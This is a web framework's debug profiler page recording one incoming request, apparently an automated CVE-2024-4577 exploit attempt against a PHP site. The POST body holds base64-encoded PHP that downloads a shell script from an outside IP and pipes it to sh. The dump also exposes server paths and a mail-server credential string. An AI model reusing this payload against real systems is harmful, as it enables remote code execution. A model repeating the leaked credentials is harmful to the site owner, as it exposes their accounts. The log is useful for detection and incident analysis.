https://159.69.16.126/hello.world?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

n/a

Request

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA
"")); echo(md5("Hello CVE-2024-4577")); ?>"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_editmode
false
_pimcore_context
"default"
_pimcore_frontend_request
true

Request Headers

Header Value
accept
"*/*"
connection
"keep-alive"
content-length
"221"
content-type
"application/x-www-form-urlencoded"
host
"159.69.16.126:443"
upgrade-insecure-requests
"1"
user-agent
"Custom-AsyncHttpClient"
x-php-ob-level
"1"

Request Content

Raw

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA=")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-language
"en"
content-type
"text/html; charset=UTF-8"
date
"Mon, 25 Nov 2024 05:38:38 GMT"
x-debug-token
"296747"
x-powered-by
"pimcore"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_DEBUG
"0"
APP_ENV
"dev"
MAILER_DSN
"smtp://4ce8d8e3d9a08e:9ab5a599066afb@smtp.mailtrap.io:2525?encryption=tls&auth_mode=login"
PIMCORE_DEV_MODE
"false"
SITE_PROTOCOL
"https"

Defined as regular env variables

Key Value
CONTENT_LENGTH
"221"
CONTENT_TYPE
"application/x-www-form-urlencoded"
CONTEXT_DOCUMENT_ROOT
"/var/www/html/credimas.it/public"
CONTEXT_PREFIX
""
DOCUMENT_ROOT
"/var/www/html/credimas.it/public"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/www"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_CONNECTION
"keep-alive"
HTTP_HOST
"159.69.16.126:443"
HTTP_UPGRADE_INSECURE_REQUESTS
"1"
HTTP_USER_AGENT
"Custom-AsyncHttpClient"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin"
PHP_SELF
"/index.php"
QUERY_STRING
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_HTTPS
"on"
REDIRECT_QUERY_STRING
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS
"200"
REDIRECT_URL
"/hello.world"
REMOTE_ADDR
"47.239.25.68"
REMOTE_PORT
"45206"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1732513118
REQUEST_TIME_FLOAT
1732513118.4641
REQUEST_URI
"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME
"/var/www/html/credimas.it/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"159.69.16.126"
SERVER_ADMIN
"admin@credimas.it"
SERVER_NAME
"159.69.16.126"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
"<address>Apache/2.4.58 (Ubuntu) Server at 159.69.16.126 Port 443</address>\n"
SERVER_SOFTWARE
"Apache/2.4.58 (Ubuntu)"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_DEBUG,PIMCORE_DEV_MODE,SITE_PROTOCOL,MAILER_DSN"
USER
"www-data"
proxy-nokeepalive
"1"

Sub Requests 1

DefaultController :: errorAction (token = 465263)

Key Value
_controller
"App\Controller\DefaultController::errorAction"
_editmode
false
_event_controller
App\Controller\DefaultController {#312
  #container: Symfony\Component\DependencyInjection\Argument\ServiceLocator {#1778 …}
}
_format
"html"
_locale
"en"
_pimcore_context
"default"
_pimcore_context_force_resolving
true
_route
"document_9"
contentDocument
Pimcore\Model\Document\Page {#1737
  #dao: null
  #dependencies: null
  #__dataVersionTimestamp: 1667563771
  #path: "/"
  #properties: [
    "footer" => Pimcore\Model\Property {#1742
      #dao: null
      #name: "footer"
      #data: "3"
      #type: "document"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: true
      #inherited: true
      name: "footer"
      data: "3"
      type: "document"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: true
      inherited: true
    }
    "language" => Pimcore\Model\Property {#1736
      #dao: null
      #name: "language"
      #data: null
      #type: "text"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: true
      #inherited: true
      name: "language"
      data: null
      type: "text"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: true
      inherited: true
    }
    "navigation_accesskey" => Pimcore\Model\Property {#1735
      #dao: null
      #name: "navigation_accesskey"
      #data: ""
      #type: "text"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: false
      #inherited: false
      name: "navigation_accesskey"
      data: ""
      type: "text"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: false
      inherited: false
    }
    "navigation_anchor" => Pimcore\Model\Property {#1731
      #dao: null
      #name: "navigation_anchor"
      #data: ""
      #type: "text"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: false
      #inherited: false
      name: "navigation_anchor"
      data: ""
      type: "text"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: false
      inherited: false
    }
    "navigation_class" => Pimcore\Model\Property {#1734
      #dao: null
      #name: "navigation_class"
      #data: ""
      #type: "text"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: false
      #inherited: false
      name: "navigation_class"
      data: ""
      type: "text"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: false
      inherited: false
    }
    "navigation_exclude" => Pimcore\Model\Property {#1740
      #dao: null
      #name: "navigation_exclude"
      #data: true
      #type: "bool"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: false
      #inherited: false
      name: "navigation_exclude"
      data: true
      type: "bool"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: false
      inherited: false
    }
    "navigation_name" => Pimcore\Model\Property {#1741
      #dao: null
      #name: "navigation_name"
      #data: "error"
      #type: "text"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: false
      #inherited: false
      name: "navigation_name"
      data: "error"
      type: "text"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: false
      inherited: false
    }
    "navigation_parameters" => Pimcore\Model\Property {#1739
      #dao: null
      #name: "navigation_parameters"
      #data: ""
      #type: "text"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: false
      #inherited: false
      name: "navigation_parameters"
      data: ""
      type: "text"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: false
      inherited: false
    }
    "navigation_relation" => Pimcore\Model\Property {#1732
      #dao: null
      #name: "navigation_relation"
      #data: ""
      #type: "text"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: false
      #inherited: false
      name: "navigation_relation"
      data: ""
      type: "text"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: false
      inherited: false
    }
    "navigation_tabindex" => Pimcore\Model\Property {#1743
      #dao: null
      #name: "navigation_tabindex"
      #data: ""
      #type: "text"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: false
      #inherited: false
      name: "navigation_tabindex"
      data: ""
      type: "text"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: false
      inherited: false
    }
    "navigation_target" => Pimcore\Model\Property {#1744
      #dao: null
      #name: "navigation_target"
      #data: null
      #type: "text"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: false
      #inherited: false
      name: "navigation_target"
      data: null
      type: "text"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: false
      inherited: false
    }
    "navigation_title" => Pimcore\Model\Property {#1745
      #dao: null
      #name: "navigation_title"
      #data: ""
      #type: "text"
      #ctype: "document"
      #cpath: null
      #cid: 9
      #inheritable: false
      #inherited: false
      name: "navigation_title"
      data: ""
      type: "text"
      ctype: "document"
      cpath: null
      cid: 9
      inheritable: false
      inherited: false
    }
  ]
  #id: 9
  #creationDate: 1667554806
  #modificationDate: 1667563771
  #versionCount: 7
  #userOwner: 2
  #locked: null
  #userModification: 2
  #parentId: 1
  #parent: null
  #_fulldump: false
  #o_dirtyFields: null
  -activeDispatchingEvents: []
  #fullPathCache: "/error"
  #type: "page"
  #key: "error"
  #index: 5
  #published: true
  #children: []
  #hasChildren: []
  #siblings: []
  #hasSiblings: []
  #controller: "App\Controller\DefaultController::errorAction"
  #template: null
  #editables: null
  #versions: null
  #contentMasterDocumentId: null
  #supportsContentMaster: true
  #missingRequiredEditable: null
  #staticGeneratorEnabled: false
  #staticGeneratorLifetime: null
  #inheritedEditables: []
  #scheduledTasks: null
  -useTargetGroup: null
  #title: "error"
  #description: ""
  #metaData: []
  #prettyUrl: null
  #targetGroupIds: ""
  +"____pimcore_cache_item__": "document_9"
  dependencies: null
  __dataVersionTimestamp: 1667563771
  path: "/"
  properties: [
    "footer" => Pimcore\Model\Property {#1742}
    "language" => Pimcore\Model\Property {#1736}
    "navigation_accesskey" => Pimcore\Model\Property {#1735}
    "navigation_anchor" => Pimcore\Model\Property {#1731}
    "navigation_class" => Pimcore\Model\Property {#1734}
    "navigation_exclude" => Pimcore\Model\Property {#1740}
    "navigation_name" => Pimcore\Model\Property {#1741}
    "navigation_parameters" => Pimcore\Model\Property {#1739}
    "navigation_relation" => Pimcore\Model\Property {#1732}
    "navigation_tabindex" => Pimcore\Model\Property {#1743}
    "navigation_target" => Pimcore\Model\Property {#1744}
    "navigation_title" => Pimcore\Model\Property {#1745}
  ]
  id: 9
  creationDate: 1667554806
  modificationDate: 1667563771
  versionCount: 7
  userOwner: 2
  locked: null
  userModification: 2
  parentId: 1
  parent: null
  _fulldump: false
  o_dirtyFields: null
  fullPathCache: "/error"
  type: "page"
  key: "error"
  index: 5
  published: true
  children: []
  hasChildren: []
  siblings: []
  hasSiblings: []
  controller: "App\Controller\DefaultController::errorAction"
  template: null
  editables: null
  versions: null
  contentMasterDocumentId: null
  supportsContentMaster: true
  missingRequiredEditable: null
  staticGeneratorEnabled: false
  staticGeneratorLifetime: null
  inheritedEditables: []
  scheduledTasks: null
  title: "error"
  description: ""
  metaData: []
  prettyUrl: null
  targetGroupIds: ""
}
exception
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#1563
  #message: "No route found for "POST https://159.69.16.126/hello.world""
  #code: 0
  #file: "/var/www/html/credimas.it/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 135
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#1570 …}
  -statusCode: 404
  -headers: []
  trace: {
    /var/www/html/credimas.it/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /var/www/html/credimas.it/vendor/symfony/event-dispatcher/EventDispatcher.php:270 {
      Symfony\Component\EventDispatcher\EventDispatcher::Symfony\Component\EventDispatcher\{closure} …
      ›     }    ($closure = \Closure::fromCallable($listener))(...$args);};
    }
    /var/www/html/credimas.it/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/html/credimas.it/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/html/credimas.it/vendor/symfony/http-kernel/HttpKernel.php:139 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/html/credimas.it/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /var/www/html/credimas.it/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/html/credimas.it/public/index.php:36 {
      › 
      › $response = $kernel->handle($request);$response->send();
    }
  }
}